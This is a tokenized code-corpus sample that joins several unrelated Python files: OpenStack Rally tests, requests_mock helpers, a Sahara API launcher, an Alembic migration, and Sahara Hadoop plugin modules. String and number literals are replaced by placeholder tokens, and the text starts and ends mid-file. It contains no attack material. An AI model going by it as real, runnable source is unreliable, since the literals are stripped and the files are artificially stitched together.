"<STR_LIT>" ) <EOL> self . client . return_value . volumes . create . assert_called_once_with ( <EOL> <NUM_LIT:1> , name = self . owner . generate_random_name . return_value ) <EOL> def test_create_snapshot ( self ) : <EOL> self . wrapped_client . create_snapshot ( "<STR_LIT>" , name = "<STR_LIT>" ) <EOL> ( self . client . return_value . volume_snapshots . create . <EOL> assert_called_once_with ( <EOL> "<STR_LIT>" , <EOL> name = self . owner . generate_random_name . return_value ) ) <EOL> def test_update_volume ( self ) : <EOL> self . wrapped_client . update_volume ( "<STR_LIT>" , name = "<STR_LIT>" , <EOL> description = "<STR_LIT>" ) <EOL> self . client . return_value . volumes . update . assert_called_once_with ( <EOL> "<STR_LIT>" , name = self . owner . generate_random_name . return_value , <EOL> description = "<STR_LIT>" ) </s>
<s> import difflib <EOL> import os <EOL> from oslo_utils import encodeutils <EOL> import rally <EOL> from rally . cli import cliutils <EOL> from tests . unit import test <EOL> RES_PATH = os . path . join ( os . path . dirname ( rally . __file__ ) , os . pardir , "<STR_LIT>" ) <EOL> class BashCompletionTestCase ( test . TestCase ) : <EOL> def test_bash_completion ( self ) : <EOL> old = open ( os . path . join ( RES_PATH , <EOL> "<STR_LIT>" ) , "<STR_LIT:r>" ) . read ( ) . splitlines ( ) <EOL> new = cliutils . _generate_bash_completion_script ( ) . splitlines ( ) <EOL> if old != new : <EOL> for line in difflib . unified_diff ( old , new ) : <EOL> print ( line ) <EOL> new_filename = "<STR_LIT>" <EOL> with open ( new_filename , "<STR_LIT:wb>" ) as new_file : <EOL> new_file . write ( encodeutils . safe_encode ( "<STR_LIT:\n>" . join ( new ) ) ) <EOL> self . fail ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( new_filename , <EOL> new_filename ) ) </s>
<s> import json as jsonutils <EOL> from requests . adapters import HTTPAdapter <EOL> from requests . cookies import MockRequest , MockResponse <EOL> from requests . cookies import RequestsCookieJar <EOL> from requests . cookies import merge_cookies , cookiejar_from_dict <EOL> from requests . packages . urllib3 . response import HTTPResponse <EOL> import six <EOL> from requests_mock import compat <EOL> from requests_mock import exceptions <EOL> _BODY_ARGS = frozenset ( [ '<STR_LIT>' , '<STR_LIT:body>' , '<STR_LIT:content>' , '<STR_LIT:text>' , '<STR_LIT>' ] ) <EOL> _HTTP_ARGS = frozenset ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> _DEFAULT_STATUS = <NUM_LIT:200> <EOL> _http_adapter = HTTPAdapter ( ) <EOL> class CookieJar ( RequestsCookieJar ) : <EOL> def set ( self , name , value , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( CookieJar , self ) . set ( name , value , ** kwargs ) <EOL> def _check_body_arguments ( ** kwargs ) : <EOL> provided = [ x for x in _BODY_ARGS if kwargs . pop ( x , None ) is not None ] <EOL> if len ( provided ) > <NUM_LIT:1> : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( provided ) ) <EOL> extra = [ x for x in kwargs if x not in _HTTP_ARGS ] <EOL> if extra : <EOL> raise TypeError ( '<STR_LIT>' <EOL> '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( extra ) ) <EOL> class _FakeConnection ( object ) : <EOL> """<STR_LIT>""" <EOL> def send ( self , request , ** kwargs ) : <EOL> msg = '<STR_LIT>' '<STR_LIT>' <EOL> raise exceptions . InvalidRequest ( msg ) <EOL> def close ( self ) : <EOL> pass <EOL> def _extract_cookies ( request , response , cookies ) : <EOL> """<STR_LIT>""" <EOL> http_message = compat . _FakeHTTPMessage ( response . headers ) <EOL> response . cookies . extract_cookies ( MockResponse ( http_message ) , <EOL> MockRequest ( request ) ) <EOL> if cookies : <EOL> merge_cookies ( response . 
cookies , cookies ) <EOL> def create_response ( request , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> connection = kwargs . pop ( '<STR_LIT>' , _FakeConnection ( ) ) <EOL> _check_body_arguments ( ** kwargs ) <EOL> raw = kwargs . pop ( '<STR_LIT>' , None ) <EOL> body = kwargs . pop ( '<STR_LIT:body>' , None ) <EOL> content = kwargs . pop ( '<STR_LIT:content>' , None ) <EOL> text = kwargs . pop ( '<STR_LIT:text>' , None ) <EOL> json = kwargs . pop ( '<STR_LIT>' , None ) <EOL> encoding = None <EOL> if content and not isinstance ( content , six . binary_type ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> if text and not isinstance ( text , six . string_types ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> if json is not None : <EOL> text = jsonutils . dumps ( json ) <EOL> if text is not None : <EOL> encoding = '<STR_LIT:utf-8>' <EOL> content = text . encode ( encoding ) <EOL> if content is not None : <EOL> body = six . BytesIO ( content ) <EOL> if not raw : <EOL> raw = HTTPResponse ( status = kwargs . get ( '<STR_LIT>' , _DEFAULT_STATUS ) , <EOL> headers = kwargs . get ( '<STR_LIT>' , { } ) , <EOL> reason = kwargs . get ( '<STR_LIT>' ) , <EOL> body = body or six . BytesIO ( six . b ( '<STR_LIT>' ) ) , <EOL> decode_content = False , <EOL> preload_content = False , <EOL> original_response = compat . _fake_http_response ) <EOL> response = _http_adapter . build_response ( request , raw ) <EOL> response . connection = connection <EOL> response . encoding = encoding <EOL> _extract_cookies ( request , response , kwargs . get ( '<STR_LIT>' ) ) <EOL> return response <EOL> class _Context ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , headers , status_code , reason , cookies ) : <EOL> self . headers = headers <EOL> self . status_code = status_code <EOL> self . reason = reason <EOL> self . cookies = cookies <EOL> class _MatcherResponse ( object ) : <EOL> def __init__ ( self , ** kwargs ) : <EOL> self . _exc = kwargs . pop ( '<STR_LIT>' , None ) <EOL> if self . 
_exc and kwargs : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> _check_body_arguments ( ** kwargs ) <EOL> self . _params = kwargs <EOL> content = self . _params . get ( '<STR_LIT:content>' ) <EOL> text = self . _params . get ( '<STR_LIT:text>' ) <EOL> if content and not ( callable ( content ) or <EOL> isinstance ( content , six . binary_type ) ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> if text and not ( callable ( text ) or <EOL> isinstance ( text , six . string_types ) ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> def get_response ( self , request ) : <EOL> if self . _exc : <EOL> raise self . _exc <EOL> cookies = self . _params . get ( '<STR_LIT>' , CookieJar ( ) ) <EOL> if isinstance ( cookies , dict ) : <EOL> cookies = cookiejar_from_dict ( cookies , CookieJar ( ) ) <EOL> context = _Context ( self . _params . get ( '<STR_LIT>' , { } ) . copy ( ) , <EOL> self . _params . get ( '<STR_LIT>' , _DEFAULT_STATUS ) , <EOL> self . _params . get ( '<STR_LIT>' ) , <EOL> cookies ) <EOL> def _call ( f , * args , ** kwargs ) : <EOL> return f ( request , context , * args , ** kwargs ) if callable ( f ) else f <EOL> return create_response ( request , <EOL> json = _call ( self . _params . get ( '<STR_LIT>' ) ) , <EOL> text = _call ( self . _params . get ( '<STR_LIT:text>' ) ) , <EOL> content = _call ( self . _params . get ( '<STR_LIT:content>' ) ) , <EOL> body = _call ( self . _params . get ( '<STR_LIT:body>' ) ) , <EOL> raw = self . _params . get ( '<STR_LIT>' ) , <EOL> status_code = context . status_code , <EOL> reason = context . reason , <EOL> headers = context . headers , <EOL> cookies = context . cookies ) </s>
<s> from sahara . utils import patches <EOL> patches . patch_minidom_writexml ( ) <EOL> import os <EOL> import sys <EOL> import oslo_i18n <EOL> from oslo_log import log as logging <EOL> possible_topdir = os . path . normpath ( os . path . join ( os . path . abspath ( sys . argv [ <NUM_LIT:0> ] ) , <EOL> os . pardir , <EOL> os . pardir ) ) <EOL> if os . path . exists ( os . path . join ( possible_topdir , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) : <EOL> sys . path . insert ( <NUM_LIT:0> , possible_topdir ) <EOL> oslo_i18n . enable_lazy ( ) <EOL> import sahara . main as server <EOL> LOG = logging . getLogger ( __name__ ) <EOL> def setup_api ( ) : <EOL> server . setup_common ( possible_topdir , '<STR_LIT>' ) <EOL> app = server . make_app ( ) <EOL> server . setup_sahara_api ( '<STR_LIT>' ) <EOL> server . setup_auth_policy ( ) <EOL> return app <EOL> def main ( ) : <EOL> app = setup_api ( ) <EOL> launcher = server . get_process_launcher ( ) <EOL> api_service = server . SaharaWSGIService ( "<STR_LIT>" , app ) <EOL> server . launch_api_service ( launcher , api_service ) </s>
<s> """<STR_LIT>""" <EOL> revision = '<STR_LIT>' <EOL> down_revision = '<STR_LIT>' <EOL> from alembic import op <EOL> import sqlalchemy as sa <EOL> def upgrade ( ) : <EOL> op . add_column ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , <EOL> nullable = True ) ) <EOL> op . add_column ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , <EOL> nullable = True ) ) <EOL> op . add_column ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , <EOL> nullable = True ) ) </s>
<s> """<STR_LIT>""" <EOL> def split_path ( path , minsegs = <NUM_LIT:1> , maxsegs = None , rest_with_last = False ) : <EOL> """<STR_LIT>""" <EOL> if not maxsegs : <EOL> maxsegs = minsegs <EOL> if minsegs > maxsegs : <EOL> raise ValueError ( '<STR_LIT>' % ( minsegs , maxsegs ) ) <EOL> if rest_with_last : <EOL> segs = path . split ( '<STR_LIT:/>' , maxsegs ) <EOL> minsegs += <NUM_LIT:1> <EOL> maxsegs += <NUM_LIT:1> <EOL> count = len ( segs ) <EOL> if ( segs [ <NUM_LIT:0> ] or count < minsegs or count > maxsegs or <EOL> '<STR_LIT>' in segs [ <NUM_LIT:1> : minsegs ] ) : <EOL> return None , None , None <EOL> else : <EOL> minsegs += <NUM_LIT:1> <EOL> maxsegs += <NUM_LIT:1> <EOL> segs = path . split ( '<STR_LIT:/>' , maxsegs ) <EOL> count = len ( segs ) <EOL> if ( segs [ <NUM_LIT:0> ] or count < minsegs or count > maxsegs + <NUM_LIT:1> or <EOL> '<STR_LIT>' in segs [ <NUM_LIT:1> : minsegs ] or <EOL> ( count == maxsegs + <NUM_LIT:1> and segs [ maxsegs ] ) ) : <EOL> raise ValueError ( '<STR_LIT>' % path ) <EOL> segs = segs [ <NUM_LIT:1> : maxsegs ] <EOL> segs . extend ( [ None ] * ( maxsegs - <NUM_LIT:1> - len ( segs ) ) ) <EOL> return segs </s>
<s> from sahara . service . edp . oozie . workflow_creator import workflow_factory <EOL> from sahara . utils import xmlutils <EOL> def get_possible_hive_config_from ( file_name ) : <EOL> '''<STR_LIT>''' <EOL> config = { <EOL> '<STR_LIT>' : xmlutils . load_hadoop_xml_defaults ( file_name ) , <EOL> '<STR_LIT>' : { } <EOL> } <EOL> return config <EOL> def get_possible_mapreduce_config_from ( file_name ) : <EOL> '''<STR_LIT>''' <EOL> config = { <EOL> '<STR_LIT>' : get_possible_pig_config_from ( file_name ) . get ( '<STR_LIT>' ) <EOL> } <EOL> config [ '<STR_LIT>' ] += workflow_factory . get_possible_mapreduce_configs ( ) <EOL> return config <EOL> def get_possible_pig_config_from ( file_name ) : <EOL> '''<STR_LIT>''' <EOL> config = { <EOL> '<STR_LIT>' : xmlutils . load_hadoop_xml_defaults ( file_name ) , <EOL> '<STR_LIT:args>' : [ ] , <EOL> '<STR_LIT>' : { } <EOL> } <EOL> return config </s>
<s> from sahara . i18n import _ <EOL> from sahara . plugins . cdh import commands as cmd <EOL> from sahara . plugins . cdh . v5_4_0 import cloudera_utils as cu <EOL> from sahara . plugins import utils as gu <EOL> from sahara . service . edp import hdfs_helper as h <EOL> from sahara . utils import cluster_progress_ops as cpo <EOL> PACKAGES = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> CU = cu . ClouderaUtilsV540 ( ) <EOL> def configure_cluster ( cluster ) : <EOL> instances = gu . get_instances ( cluster ) <EOL> if not cmd . is_pre_installed_cdh ( CU . pu . get_manager ( cluster ) . remote ( ) ) : <EOL> CU . pu . configure_os ( instances ) <EOL> CU . pu . install_packages ( instances , PACKAGES ) <EOL> CU . pu . start_cloudera_agents ( instances ) <EOL> CU . pu . start_cloudera_manager ( cluster ) <EOL> CU . update_cloudera_password ( cluster ) <EOL> CU . await_agents ( cluster , instances ) <EOL> CU . create_mgmt_service ( cluster ) <EOL> CU . create_services ( cluster ) <EOL> CU . configure_services ( cluster ) <EOL> CU . configure_instances ( instances , cluster ) <EOL> CU . deploy_configs ( cluster ) <EOL> @ cpo . 
event_wrapper ( <EOL> True , step = _ ( "<STR_LIT>" ) , param = ( '<STR_LIT>' , <NUM_LIT:0> ) ) <EOL> def _start_roles ( cluster , instances ) : <EOL> for instance in instances : <EOL> if '<STR_LIT>' in instance . node_group . node_processes : <EOL> hdfs = CU . get_service_by_role ( '<STR_LIT>' , instance = instance ) <EOL> CU . start_roles ( hdfs , CU . pu . get_role_name ( instance , '<STR_LIT>' ) ) <EOL> if '<STR_LIT>' in instance . node_group . node_processes : <EOL> yarn = CU . get_service_by_role ( '<STR_LIT>' , instance = instance ) <EOL> CU . start_roles ( yarn , CU . pu . get_role_name ( instance , '<STR_LIT>' ) ) <EOL> def scale_cluster ( cluster , instances ) : <EOL> if not instances : <EOL> return <EOL> if not cmd . is_pre_installed_cdh ( instances [ <NUM_LIT:0> ] . remote ( ) ) : <EOL> CU . pu . configure_os ( instances ) <EOL> CU . pu . install_packages ( instances , PACKAGES ) <EOL> CU . pu . start_cloudera_agents ( instances ) <EOL> CU . await_agents ( cluster , instances ) <EOL> CU . configure_instances ( instances , cluster ) <EOL> CU . update_configs ( instances ) <EOL> CU . pu . configure_swift ( cluster , instances ) <EOL> CU . refresh_datanodes ( cluster ) <EOL> _start_roles ( cluster , instances ) <EOL> def decommission_cluster ( cluster , instances ) : <EOL> dns = [ ] <EOL> nms = [ ] <EOL> for i in instances : <EOL> if '<STR_LIT>' in i . node_group . node_processes : <EOL> dns . append ( CU . pu . get_role_name ( i , '<STR_LIT>' ) ) <EOL> if '<STR_LIT>' in i . node_group . node_processes : <EOL> nms . append ( CU . pu . get_role_name ( i , '<STR_LIT>' ) ) <EOL> if dns : <EOL> CU . decommission_nodes ( cluster , '<STR_LIT>' , dns ) <EOL> if nms : <EOL> CU . decommission_nodes ( cluster , '<STR_LIT>' , nms ) <EOL> CU . delete_instances ( cluster , instances ) <EOL> CU . refresh_datanodes ( cluster ) <EOL> CU . refresh_yarn_nodes ( cluster ) <EOL> @ cpo . 
event_wrapper ( True , step = _ ( "<STR_LIT>" ) , param = ( '<STR_LIT>' , <NUM_LIT:0> ) ) <EOL> def _prepare_cluster ( cluster ) : <EOL> if CU . pu . get_oozie ( cluster ) : <EOL> CU . pu . install_extjs ( cluster ) <EOL> if CU . pu . get_hive_metastore ( cluster ) : <EOL> CU . pu . configure_hive ( cluster ) <EOL> if CU . pu . get_sentry ( cluster ) : <EOL> CU . pu . configure_sentry ( cluster ) <EOL> @ cpo . event_wrapper ( <EOL> True , step = _ ( "<STR_LIT>" ) , param = ( '<STR_LIT>' , <NUM_LIT:0> ) ) <EOL> def _finish_cluster_starting ( cluster ) : <EOL> if CU . pu . get_hive_metastore ( cluster ) : <EOL> CU . pu . put_hive_hdfs_xml ( cluster ) <EOL> server = CU . pu . get_hbase_master ( cluster ) <EOL> if CU . pu . c_helper . is_hbase_common_lib_enabled ( cluster ) and server : <EOL> with server . remote ( ) as r : <EOL> h . create_hbase_common_lib ( r ) <EOL> if CU . pu . get_flumes ( cluster ) : <EOL> flume = CU . get_service_by_role ( '<STR_LIT>' , cluster ) <EOL> CU . start_service ( flume ) <EOL> def start_cluster ( cluster ) : <EOL> _prepare_cluster ( cluster ) <EOL> CU . first_run ( cluster ) <EOL> CU . pu . configure_swift ( cluster ) <EOL> if len ( CU . pu . get_jns ( cluster ) ) > <NUM_LIT:0> : <EOL> CU . enable_namenode_ha ( cluster ) <EOL> CU . update_role_config ( CU . pu . get_secondarynamenode ( cluster ) , <EOL> '<STR_LIT>' ) <EOL> if CU . pu . get_stdb_rm ( cluster ) : <EOL> CU . enable_resourcemanager_ha ( cluster ) <EOL> CU . update_role_config ( CU . pu . 
get_stdb_rm ( cluster ) , '<STR_LIT>' ) <EOL> _finish_cluster_starting ( cluster ) <EOL> def get_open_ports ( node_group ) : <EOL> ports = [ <NUM_LIT> ] <EOL> ports_map = { <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> } <EOL> for process in node_group . node_processes : <EOL> if process in ports_map : <EOL> ports . extend ( ports_map [ process ] ) <EOL> return ports </s>
<s> import re <EOL> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> import six <EOL> from sahara import context <EOL> from sahara import exceptions as e <EOL> from sahara . i18n import _ <EOL> from sahara . i18n import _LI <EOL> from sahara . i18n import _LW <EOL> from sahara . plugins import exceptions as ex <EOL> from sahara . plugins import utils <EOL> from sahara . swift import swift_helper as h <EOL> from sahara . topology import topology_helper as th <EOL> CONF = cfg . CONF <EOL> TOPOLOGY_CONFIG = { <EOL> "<STR_LIT>" : <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" : <EOL> "<STR_LIT>" <EOL> } <EOL> LOG = logging . getLogger ( __name__ ) <EOL> def create_service ( name ) : <EOL> for cls in Service . __subclasses__ ( ) : <EOL> if cls . get_service_id ( ) == name : <EOL> return cls ( ) <EOL> return Service ( name ) <EOL> class Service ( object ) : <EOL> def __init__ ( self , name , ambari_managed = True ) : <EOL> self . name = name <EOL> self . configurations = set ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . components = [ ] <EOL> self . users = [ ] <EOL> self . deployed = False <EOL> self . ambari_managed = ambari_managed <EOL> def add_component ( self , component ) : <EOL> self . components . append ( component ) <EOL> def add_user ( self , user ) : <EOL> self . users . 
append ( user ) <EOL> def validate ( self , cluster_spec , cluster ) : <EOL> pass <EOL> def finalize_configuration ( self , cluster_spec ) : <EOL> pass <EOL> def register_user_input_handlers ( self , ui_handlers ) : <EOL> pass <EOL> def register_service_urls ( self , cluster_spec , url_info , cluster ) : <EOL> return url_info <EOL> def pre_service_start ( self , cluster_spec , ambari_info , started_services ) : <EOL> pass <EOL> def finalize_ng_components ( self , cluster_spec ) : <EOL> pass <EOL> def is_user_template_component ( self , component ) : <EOL> return True <EOL> def is_mandatory ( self ) : <EOL> return False <EOL> def _replace_config_token ( self , cluster_spec , token , value , props ) : <EOL> for config_name , props in six . iteritems ( props ) : <EOL> config = cluster_spec . configurations [ config_name ] <EOL> for prop in props : <EOL> config [ prop ] = config [ prop ] . replace ( token , value ) <EOL> def _update_config_values ( self , configurations , value , props ) : <EOL> for absolute_prop_name in props : <EOL> tokens = absolute_prop_name . split ( '<STR_LIT:/>' ) <EOL> config_name = tokens [ <NUM_LIT:0> ] <EOL> prop_name = tokens [ <NUM_LIT:1> ] <EOL> config = configurations [ config_name ] <EOL> config [ prop_name ] = value <EOL> def _get_common_paths ( self , node_groups ) : <EOL> sets = [ ] <EOL> for node_group in node_groups : <EOL> for instance in node_group . instances : <EOL> sets . append ( set ( instance . sahara_instance . storage_paths ( ) ) ) <EOL> return list ( set . intersection ( * sets ) ) if sets else [ ] <EOL> def _generate_storage_path ( self , storage_paths , path ) : <EOL> return "<STR_LIT:U+002C>" . join ( [ p + path for p in storage_paths ] ) <EOL> def _get_port_from_cluster_spec ( self , cluster_spec , service , prop_name ) : <EOL> address = cluster_spec . configurations [ service ] [ prop_name ] <EOL> return utils . 
get_port_from_address ( address ) <EOL> class HdfsService ( Service ) : <EOL> def __init__ ( self ) : <EOL> super ( HdfsService , self ) . __init__ ( HdfsService . get_service_id ( ) ) <EOL> self . configurations . add ( '<STR_LIT>' ) <EOL> @ classmethod <EOL> def get_service_id ( cls ) : <EOL> return '<STR_LIT>' <EOL> def validate ( self , cluster_spec , cluster ) : <EOL> nn_count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> jn_count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> zkfc_count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> if cluster_spec . is_hdfs_ha_enabled ( cluster ) : <EOL> if nn_count != <NUM_LIT:2> : <EOL> raise ex . NameNodeHAConfigurationError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % nn_count ) <EOL> if not ( jn_count >= <NUM_LIT:3> and ( jn_count % <NUM_LIT:2> == <NUM_LIT:1> ) ) : <EOL> raise ex . NameNodeHAConfigurationError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % jn_count ) <EOL> else : <EOL> if nn_count != <NUM_LIT:1> : <EOL> raise ex . InvalidComponentCountException ( '<STR_LIT>' , <NUM_LIT:1> , <EOL> nn_count ) <EOL> if jn_count > <NUM_LIT:0> : <EOL> raise ex . NameNodeHAConfigurationError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if zkfc_count > <NUM_LIT:0> : <EOL> raise ex . NameNodeHAConfigurationError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def finalize_configuration ( self , cluster_spec ) : <EOL> nn_hosts = cluster_spec . determine_component_hosts ( '<STR_LIT>' ) <EOL> if nn_hosts : <EOL> props = { '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] } <EOL> self . _replace_config_token ( <EOL> cluster_spec , '<STR_LIT>' , nn_hosts . pop ( ) . fqdn ( ) , props ) <EOL> snn_hosts = cluster_spec . determine_component_hosts ( <EOL> '<STR_LIT>' ) <EOL> if snn_hosts : <EOL> props = { '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> self . _replace_config_token ( <EOL> cluster_spec , '<STR_LIT>' , snn_hosts . pop ( ) . 
fqdn ( ) , props ) <EOL> core_site_config = cluster_spec . configurations [ '<STR_LIT>' ] <EOL> for prop in self . _get_swift_properties ( ) : <EOL> core_site_config [ prop [ '<STR_LIT:name>' ] ] = prop [ '<STR_LIT:value>' ] <EOL> if CONF . enable_data_locality : <EOL> for prop in th . vm_awareness_core_config ( ) : <EOL> core_site_config [ prop [ '<STR_LIT:name>' ] ] = prop [ '<STR_LIT:value>' ] <EOL> core_site_config . update ( TOPOLOGY_CONFIG ) <EOL> nn_ng = cluster_spec . get_node_groups_containing_component ( <EOL> '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> dn_node_groups = cluster_spec . get_node_groups_containing_component ( <EOL> '<STR_LIT>' ) <EOL> common_paths = [ ] <EOL> if dn_node_groups : <EOL> common_paths = self . _get_common_paths ( dn_node_groups ) <EOL> hdfs_site_config = cluster_spec . configurations [ '<STR_LIT>' ] <EOL> hdfs_site_config [ '<STR_LIT>' ] = ( <EOL> self . _generate_storage_path ( <EOL> self . _get_common_paths ( [ nn_ng ] ) , '<STR_LIT>' ) ) <EOL> if common_paths : <EOL> hdfs_site_config [ '<STR_LIT>' ] = ( <EOL> self . _generate_storage_path ( <EOL> common_paths , '<STR_LIT>' ) ) <EOL> def register_service_urls ( self , cluster_spec , url_info , cluster ) : <EOL> namenode_ip = cluster_spec . determine_component_hosts ( <EOL> '<STR_LIT>' ) . pop ( ) . management_ip <EOL> ui_port = self . _get_port_from_cluster_spec ( cluster_spec , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> nn_port = self . _get_port_from_cluster_spec ( cluster_spec , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> url_info [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : '<STR_LIT>' % ( namenode_ip , ui_port ) , <EOL> '<STR_LIT>' : '<STR_LIT>' % ( namenode_ip , nn_port ) <EOL> } <EOL> if cluster_spec . is_hdfs_ha_enabled ( cluster ) : <EOL> url_info [ '<STR_LIT>' ] . update ( { <EOL> '<STR_LIT>' : '<STR_LIT>' % cluster . name } ) <EOL> return url_info <EOL> def finalize_ng_components ( self , cluster_spec ) : <EOL> hdfs_ng = cluster_spec . 
get_node_groups_containing_component ( <EOL> '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> components = hdfs_ng . components <EOL> if not cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) : <EOL> zk_service = next ( service for service in cluster_spec . services <EOL> if service . name == '<STR_LIT>' ) <EOL> zk_service . deployed = True <EOL> components . append ( '<STR_LIT>' ) <EOL> def is_mandatory ( self ) : <EOL> return True <EOL> def _get_swift_properties ( self ) : <EOL> return h . get_swift_configs ( ) <EOL> class MapReduce2Service ( Service ) : <EOL> def __init__ ( self ) : <EOL> super ( MapReduce2Service , self ) . __init__ ( <EOL> MapReduce2Service . get_service_id ( ) ) <EOL> self . configurations . add ( '<STR_LIT>' ) <EOL> @ classmethod <EOL> def get_service_id ( cls ) : <EOL> return '<STR_LIT>' <EOL> def validate ( self , cluster_spec , cluster ) : <EOL> count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> if count != <NUM_LIT:1> : <EOL> raise ex . InvalidComponentCountException ( '<STR_LIT>' , <NUM_LIT:1> , count ) <EOL> def finalize_configuration ( self , cluster_spec ) : <EOL> hs_hosts = cluster_spec . determine_component_hosts ( '<STR_LIT>' ) <EOL> if hs_hosts : <EOL> props = { '<STR_LIT>' : [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] } <EOL> self . _replace_config_token ( <EOL> cluster_spec , '<STR_LIT>' , hs_hosts . pop ( ) . fqdn ( ) , props ) <EOL> mapred_site_config = cluster_spec . configurations [ '<STR_LIT>' ] <EOL> if CONF . enable_data_locality : <EOL> for prop in th . vm_awareness_mapred_config ( ) : <EOL> mapred_site_config [ prop [ '<STR_LIT:name>' ] ] = prop [ '<STR_LIT:value>' ] <EOL> def register_service_urls ( self , cluster_spec , url_info , cluster ) : <EOL> historyserver_ip = cluster_spec . determine_component_hosts ( <EOL> 